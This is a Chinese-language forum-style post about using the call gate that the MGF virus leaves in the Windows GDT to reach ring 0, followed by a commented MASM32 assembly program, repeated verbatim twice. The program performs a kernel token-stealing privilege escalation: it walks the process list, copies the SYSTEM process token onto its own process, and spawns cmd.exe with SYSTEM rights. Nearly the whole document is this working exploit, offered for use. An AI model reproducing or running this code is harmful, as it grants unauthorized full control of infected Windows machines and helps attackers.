去年有个叫MGF的病毒,我想大家还没有忘记吧,它修改NTLDR文件进入ring0,那么进入ring0我们究竟能做些什么呢?其实能做的事情很多,不过网上有很多进入ring0的代码说实话其实没有什么用:首先它们进入ring0之后,代码仍然在0x80000000以下的用户空间,一旦发生进程上下文切换,代码所在的页就可能被换出去或者不再属于当前地址空间,解决方法是用ExAllocatePool申请一块非分页内存,把需要运行的代码拷贝过去,最后创建一个系统线程就可以了,这样你的代码就和驱动程序的代码一样,IRQL = PASSIVE_LEVEL。好像扯远了,回到正题,那么如何利用MGF病毒呢?答案是使用MGF留在GDT中的callgate,利用这个调用门,我们就可以进入ring0,修改系统内存中的数据结构,例如当前进程的令牌,使我们能够提升权限。需要注意的是,下面代码里硬编码的内核结构偏移(0x44、0x9c、0xa0、0x12c)和system进程的PID(8)都与具体的Windows版本绑定,换一个版本就必须重新核对,偏移错了写的就是别的内核内存。下面我就把我的垃圾代码贴出来,高手就别看了,今天就算是灌灌水吧。
;NE365 shadow3
.386
.model flat,stdcall
option casemap:none
include d:/masm32/include/windows.inc
include d:/masm32/include/kernel32.inc
include d:/masm32/include/user32.inc
includelib d:/masm32/lib/kernel32.lib
includelib d:/masm32/lib/user32.lib
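.data
; Far pointer used to go through the call gate that the post says MGF leaves in
; the GDT. A call gate ignores the offset; only the selector matters:
; 103h = GDT index 20h, RPL 3. If the gate is not installed the far call raises
; #GP and the process simply crashes - there is no ring-3 way to probe for it here.
CallSel         dd 0
                dw 103h

; Kernel layout assumed by the original post. Every value below is tied to one
; specific 32-bit Windows build (the post does not say which); verify them
; against the target's kernel symbols before running. A wrong offset does not
; fail cleanly - it reads or writes some other kernel memory.
PCR_CURRENT_THREAD  equ 0FFDFF124h  ; PCR-based pointer to the current thread (post: "KTEB")
KT_PROCESS          equ 044h        ; thread -> owning process block (post: "KPEB")
EP_LINKS            equ 0A0h        ; process-list link inside the process block, walked Flink-first
EP_PID              equ 09Ch        ; process id inside the process block
EP_TOKEN            equ 012Ch       ; primary token pointer inside the process block
SYSTEM_PID          equ 8           ; pid of the system process on the post's target

pi              PROCESS_INFORMATION <>
stStartup       STARTUPINFOA <>
OldToken        dd 0                ; our original token pointer; non-zero once we swapped it out
szToken         db '当前system进程令牌为0x%08x',0
szNoSystem      db 'system process (pid 8) not found; token left unchanged',0
szCmd           db 'cmd.exe',0      ; unqualified name: resolved by the normal CreateProcess search order
szBuffer        db 512 dup(0)
;DEBUG equ 1
.code
;-----------------------------------------------------------------------
; start - entry point.
;   1. Go through the MGF call gate, walk the process list from our own
;      process, copy the system process's token pointer over ours.
;   2. Back in ring 3, report the token and spawn cmd.exe, which is given
;      its token at creation time and therefore keeps the elevated one.
;   3. Go through the gate once more and put our original token back.
; Step 3 is new: the pointer copy in step 1 takes no reference on the
; system token, so exiting while we still hold it unbalances the object
; reference counts (one too few on the system token, one leaked on ours).
; Restoring the pointer before ExitProcess keeps both counts as they were.
;
; Ring-0 sections clobber eax, ecx, esi and flags; nothing is preserved
; across them and no API may be called while in ring 0.
;-----------------------------------------------------------------------
start:
; ---- ring 0, first trip: swap our token for the system process's -----
; Assumption inherited from the original: the gate target resumes at the
; instruction after this far call while still in ring 0, leaving the
; ring-3 CS/ESP/SS frame on the ring-0 stack for the retf below to consume.
    call    fword ptr [CallSel]
    mov     eax, PCR_CURRENT_THREAD
    mov     eax, [eax]              ; eax = current thread
IFDEF DEBUG
    jmp     @leave_ring0_1          ; DEBUG: only report the thread pointer, touch nothing
ENDIF
    mov     esi, [eax+KT_PROCESS]   ; esi = our own process block
    mov     ecx, esi                ; ecx = cursor over the process list
@search:
    mov     ecx, [ecx+EP_LINKS]     ; Flink of the next list entry
    sub     ecx, EP_LINKS           ; back to the start of that process block
    cmp     ecx, esi                ; came full circle: no match, bail out
    je      @not_found              ;   (original spun forever in ring 0 here)
    cmp     dword ptr [ecx+EP_PID], SYSTEM_PID
    jne     @search
    mov     eax, [esi+EP_TOKEN]     ; remember our token so it can be put back
    mov     [OldToken], eax
    mov     eax, [ecx+EP_TOKEN]     ; eax = system token (reported below)
    mov     [esi+EP_TOKEN], eax     ; plain pointer copy, no reference taken
    jmp     @leave_ring0_1
@not_found:
    xor     eax, eax                ; eax = 0 signals "nothing was swapped"
@leave_ring0_1:
    push    offset @back_in_ring3_1
    retf                            ; pops CS:EIP, then SS:ESP of the ring-3 caller
@back_in_ring3_1:

; ---- ring 3: report -------------------------------------------------
    test    eax, eax
    jz      @report_missing
    push    eax
    push    offset szToken
    push    offset szBuffer
    call    wsprintf
    add     esp, 3*4                ; wsprintf is cdecl: the caller removes the arguments
    invoke  MessageBox, 0, offset szBuffer, 0, 0
    cmp     OldToken, 0
    je      @done                   ; DEBUG build: nothing was swapped, nothing to inherit

; ---- ring 3: spawn the child while we hold the system token ----------
    invoke  GetStartupInfo, offset stStartup   ; the original never pushed this argument
    invoke  CreateProcess, 0, offset szCmd, 0, 0, TRUE, 0, 0, 0, offset stStartup, offset pi

; ---- ring 0, second trip: restore our own token before exiting -------
    call    fword ptr [CallSel]
    mov     eax, PCR_CURRENT_THREAD
    mov     eax, [eax]
    mov     esi, [eax+KT_PROCESS]
    mov     eax, OldToken
    mov     [esi+EP_TOKEN], eax
    push    offset @back_in_ring3_2
    retf
@back_in_ring3_2:
    jmp     @done

@report_missing:
    invoke  MessageBox, 0, offset szNoSystem, 0, 0
@done:
    invoke  ExitProcess, 0
end start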
;NE365 shadow3
.386
.model flat,stdcall
option casemap:none
include d:/masm32/include/windows.inc
include d:/masm32/include/kernel32.inc
include d:/masm32/include/user32.inc
includelib d:/masm32/lib/kernel32.lib
includelib d:/masm32/lib/user32.lib
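.data
; Far pointer used to go through the call gate that the post says MGF leaves in
; the GDT. A call gate ignores the offset; only the selector matters:
; 103h = GDT index 20h, RPL 3. If the gate is not installed the far call raises
; #GP and the process simply crashes - there is no ring-3 way to probe for it here.
CallSel         dd 0
                dw 103h

; Kernel layout assumed by the original post. Every value below is tied to one
; specific 32-bit Windows build (the post does not say which); verify them
; against the target's kernel symbols before running. A wrong offset does not
; fail cleanly - it reads or writes some other kernel memory.
PCR_CURRENT_THREAD  equ 0FFDFF124h  ; PCR-based pointer to the current thread (post: "KTEB")
KT_PROCESS          equ 044h        ; thread -> owning process block (post: "KPEB")
EP_LINKS            equ 0A0h        ; process-list link inside the process block, walked Flink-first
EP_PID              equ 09Ch        ; process id inside the process block
EP_TOKEN            equ 012Ch       ; primary token pointer inside the process block
SYSTEM_PID          equ 8           ; pid of the system process on the post's target

pi              PROCESS_INFORMATION <>
stStartup       STARTUPINFOA <>
OldToken        dd 0                ; our original token pointer; non-zero once we swapped it out
szToken         db '当前system进程令牌为0x%08x',0
szNoSystem      db 'system process (pid 8) not found; token left unchanged',0
szCmd           db 'cmd.exe',0      ; unqualified name: resolved by the normal CreateProcess search order
szBuffer        db 512 dup(0)
;DEBUG equ 1
.code
;-----------------------------------------------------------------------
; start - entry point.
;   1. Go through the MGF call gate, walk the process list from our own
;      process, copy the system process's token pointer over ours.
;   2. Back in ring 3, report the token and spawn cmd.exe, which is given
;      its token at creation time and therefore keeps the elevated one.
;   3. Go through the gate once more and put our original token back.
; Step 3 is new: the pointer copy in step 1 takes no reference on the
; system token, so exiting while we still hold it unbalances the object
; reference counts (one too few on the system token, one leaked on ours).
; Restoring the pointer before ExitProcess keeps both counts as they were.
;
; Ring-0 sections clobber eax, ecx, esi and flags; nothing is preserved
; across them and no API may be called while in ring 0.
;-----------------------------------------------------------------------
start:
; ---- ring 0, first trip: swap our token for the system process's -----
; Assumption inherited from the original: the gate target resumes at the
; instruction after this far call while still in ring 0, leaving the
; ring-3 CS/ESP/SS frame on the ring-0 stack for the retf below to consume.
    call    fword ptr [CallSel]
    mov     eax, PCR_CURRENT_THREAD
    mov     eax, [eax]              ; eax = current thread
IFDEF DEBUG
    jmp     @leave_ring0_1          ; DEBUG: only report the thread pointer, touch nothing
ENDIF
    mov     esi, [eax+KT_PROCESS]   ; esi = our own process block
    mov     ecx, esi                ; ecx = cursor over the process list
@search:
    mov     ecx, [ecx+EP_LINKS]     ; Flink of the next list entry
    sub     ecx, EP_LINKS           ; back to the start of that process block
    cmp     ecx, esi                ; came full circle: no match, bail out
    je      @not_found              ;   (original spun forever in ring 0 here)
    cmp     dword ptr [ecx+EP_PID], SYSTEM_PID
    jne     @search
    mov     eax, [esi+EP_TOKEN]     ; remember our token so it can be put back
    mov     [OldToken], eax
    mov     eax, [ecx+EP_TOKEN]     ; eax = system token (reported below)
    mov     [esi+EP_TOKEN], eax     ; plain pointer copy, no reference taken
    jmp     @leave_ring0_1
@not_found:
    xor     eax, eax                ; eax = 0 signals "nothing was swapped"
@leave_ring0_1:
    push    offset @back_in_ring3_1
    retf                            ; pops CS:EIP, then SS:ESP of the ring-3 caller
@back_in_ring3_1:

; ---- ring 3: report -------------------------------------------------
    test    eax, eax
    jz      @report_missing
    push    eax
    push    offset szToken
    push    offset szBuffer
    call    wsprintf
    add     esp, 3*4                ; wsprintf is cdecl: the caller removes the arguments
    invoke  MessageBox, 0, offset szBuffer, 0, 0
    cmp     OldToken, 0
    je      @done                   ; DEBUG build: nothing was swapped, nothing to inherit

; ---- ring 3: spawn the child while we hold the system token ----------
    invoke  GetStartupInfo, offset stStartup   ; the original never pushed this argument
    invoke  CreateProcess, 0, offset szCmd, 0, 0, TRUE, 0, 0, 0, offset stStartup, offset pi

; ---- ring 0, second trip: restore our own token before exiting -------
    call    fword ptr [CallSel]
    mov     eax, PCR_CURRENT_THREAD
    mov     eax, [eax]
    mov     esi, [eax+KT_PROCESS]
    mov     eax, OldToken
    mov     [esi+EP_TOKEN], eax
    push    offset @back_in_ring3_2
    retf
@back_in_ring3_2:
    jmp     @done

@report_missing:
    invoke  MessageBox, 0, offset szNoSystem, 0, 0
@done:
    invoke  ExitProcess, 0
end start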